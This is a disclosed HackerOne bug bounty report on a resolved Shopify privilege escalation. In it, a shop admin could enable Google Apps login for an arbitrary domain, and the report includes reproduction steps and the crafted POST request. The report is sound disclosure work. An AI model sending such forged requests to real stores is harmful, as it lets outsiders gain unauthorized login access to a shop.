# Shop admin can change external login services

### SUMMARY BY SHOPIFY

An issue where any user could enable Google Apps integration, and allow anyone from a custom Google Apps Domain to login in the store via OAuth. The issue could only be triggered by a logged-in staff member of the store, but this feature should be available to the store owner only.

### VULNERABILITY INFORMATION

 'Login services' section in the Settings->Account is accessible only to the Account owners. However, shop admins (full access users) can escalate privileges and modify the login services.

To verify,
1. Log into https://seclearn.myshopify.com as admin.
2. Navigate to settings->Account, notice that it does not show Login Services section to this user. However, he can modify the Login Services by sending the below request (use proper authenticity_token and cookies before sending the request).

	POST /admin/login_services/google_apps/update HTTP/1.1
	Host: seclearn.myshopify.com
	User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
	Cookie: ...
	Content-Type: application/x-www-form-urlencoded
	
	utf8=%E2%9C%93&_method=patch&authenticity_token=xxxxxPaAQQFSKgdwaJr6XWqFbBkQ%3D&shop%5Bgoogle_apps_login_enabled%5D=0&shop%5Bgoogle_apps_login_enabled%5D=1&shop%5Bgoogle_apps_domain%5D=securitylearn.net&commit=Save


3. To confirm, log in as Account owner and look at the Login Services section. Notice that, Google apps are enabled and securitylearn.net is added to the google app domain.

---

| Field | Value |
|-------|-------|
| **Report ID** | #56626 |
| **Title** | Shop admin can change external login services |
| **URL** | https://hackerone.com/reports/56626 |
| **State** | Resolved |
| **Severity** | ? (?) |
| **Weakness** | Privilege Escalation |
| **Program** | Shopify |
| **Reporter** | satishb3 |
| **Submitted** | April 16, 2015, 9:53AM UTC |
| **Disclosed** | October 2, 2015, 3:34AM UTC |
| **Visibility** | full |
| **Bounty** | None |

--- *Downloaded from https://hackerone.com/reports/56626*